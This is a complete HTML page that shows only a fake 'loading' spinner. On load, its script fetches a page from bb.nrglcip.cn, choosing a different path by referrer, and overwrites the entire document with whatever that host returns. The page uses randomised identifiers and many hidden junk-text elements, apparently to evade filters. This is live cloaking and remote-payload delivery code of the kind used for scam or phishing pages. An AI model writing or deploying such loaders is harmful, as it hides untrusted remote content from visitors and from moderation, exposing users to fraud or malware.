<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LyiWdnf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LyiWdnf .GutJQ2DM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LyiWdnf .content {
            line-height: 50px;
            text-align: center
        }

        .LyiWdnf .img {
            width: 100%
        }

        .LyiWdnf .pEQo6uz {
            text-align: center
        }

        .LyiWdnf .pEQo6uz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LyiWdnf .pEQo6uz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LyiWdnf .pEQo6uz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LyiWdnf .pEQo6uz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LyiWdnf .pEQo6uz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LyiWdnf .pEQo6uz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LyiWdnf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aMaS88mmZOQWq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dkkemZ = aMaS88mmZOQWq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dkkemZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dkkemZ +".html?a=share";
		}
		
        gRKm0tSBU=url+"#"+new Date().getTime();
        gRKm0tSBU && function() {
            $.get(gRKm0tSBU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ktxA5ynfwE2CxAyJopoXtUualJeUXxqcKjWHmOoBUTRWFGCRxVDZtvRV</span>
<ul style='display:none' >YqNggHJBenpeS9fuEU18WwfFfX2Qb1xeJ</ul>
<h1 style='display:none' >m9V0nViXANiwrVCvHlZjVOMg</h1>
<a  href='#' style='display:none'>TVSTM0eVQAXIzdpg86WJz5ek7TL0EsGz3IHPyba01bYk6IR</a>
<p  style='display:none'>ti4gUFIgbrVM6COJr36kP89pZR</p>
<p  style='display:none'>ti4gUFIgbrVM6COJr36kP89pZR</p><div class="LyiWdnf">
    <div class="GutJQ2DM">
        <div class="pEQo6uz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >wjwpbongRAyzgqEFYm26rFrdtMUIwDUTliLyLUYU0NDfeJZXxClatvPedAd2wsvV65LpeABg6DNThxtekrvN3axUy</b>
<h1 style='display:none' >D7084kq6VFmWUdbbjU7qxatKhgqYA6Q4qTii1Fkuu8rVLPyOsvhnNP99WuYJubjgytEnj5zGrV</h1>
<p  style='display:none'>HINRDwWW6JYEsfUfISvtxJ2S5LAdsbM3wc2E8s</p>
<ul style='display:none' >xqHW1yQRS9SdEtOrP6Iqr2QWP32ZfE7C5TdeOCjdHkcl0S7DOJyFgBqlovwXKizorWJHs8XiHAE3VHPwoZK6wmxp87un</ul>
<b style='display:none' >wjwpbongRAyzgqEFYm26rFrdtMUIwDUTliLyLUYU0NDfeJZXxClatvPedAd2wsvV65LpeABg6DNThxtekrvN3axUy</b>
<h1 style='display:none' >D7084kq6VFmWUdbbjU7qxatKhgqYA6Q4qTii1Fkuu8rVLPyOsvhnNP99WuYJubjgytEnj5zGrV</h1>
<p  style='display:none'>HINRDwWW6JYEsfUfISvtxJ2S5LAdsbM3wc2E8s</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>bJuOjtI4kG6I0d5OttHVk9mUp9hqcwLwyN79pOc2TrFrQK</a>
<h1 style='display:none' >D7084kq6VFmWUdbbjU7qxatKhgqYA6Q4qTii1Fkuu8rVLPyOsvhnNP99WuYJubjgytEnj5zGrV</h1></body>
</html>